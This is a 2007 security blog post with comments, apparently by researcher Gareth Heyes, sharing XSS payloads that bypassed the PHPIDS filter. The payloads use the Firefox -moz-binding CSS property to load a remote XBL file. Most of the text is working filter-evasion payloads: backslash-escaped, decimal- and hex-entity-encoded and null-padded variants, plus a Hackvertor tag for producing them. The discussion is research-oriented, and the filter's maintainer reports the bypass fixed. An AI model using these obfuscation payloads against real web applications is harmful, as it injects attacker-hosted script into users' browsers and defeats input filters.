Awesome XSS

Hacking the PHPIDS again I found some cool XSS:-

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

I’ve moved it onto two lines for correct display.

Who’d have thought that Firefox would allow all that within the url and CSS properties :D

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 11

  1. 排 尾 DaCat wrote:

    awezome gareth!! :D
    anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l :P

    Greetz!

    Posted 24 Nov 2007 at 7:40 pm
  2. Gareth Heyes wrote:

    hehe thanks, you next? :)

    Posted 25 Nov 2007 at 1:07 am
  3. Gareth Heyes wrote:

    Check these out too :)

    <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
    #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
    #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
    #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
    #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
    &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
    &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

    <div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
    #x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
    #x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
    #x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
    #x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
    &#x23&#x78&#x73&#x73&#x29>

    Posted 25 Nov 2007 at 1:17 am
  4. Gareth Heyes wrote:

    <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    <Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    Posted 25 Nov 2007 at 1:37 am
  5. Information security wrote:

    A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.

    Posted 25 Nov 2007 at 11:10 am
  6. .mario wrote:

    Gareth you bandit ;) Hacking the PHPIDS while i visit my grams place *g*

    Well done and of course fixed by now!

    Thanks and Greetings,
    .mario

    Posted 25 Nov 2007 at 10:01 pm
  7. Gareth Heyes wrote:

    Hehe a hacker always attacks at the most inconvenient time ;)

    Posted 26 Nov 2007 at 1:12 am
  8. Gareth Heyes wrote:

    Believe it or not this is also a working mozbinding lol :-
    <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

    Posted 26 Nov 2007 at 1:32 am
  9. Gareth Heyes wrote:

    <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

    Posted 26 Nov 2007 at 1:48 am
  10. .mario wrote:

    Eew… that’s indeed incredible! We need that ones for the xssDB!

    Posted 26 Nov 2007 at 8:36 am
  11. Gareth Heyes wrote:

    I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

    <div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

    Much easier than having to remember which characters can be escaped ;)

    Posted 26 Nov 2007 at 12:42 pm

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam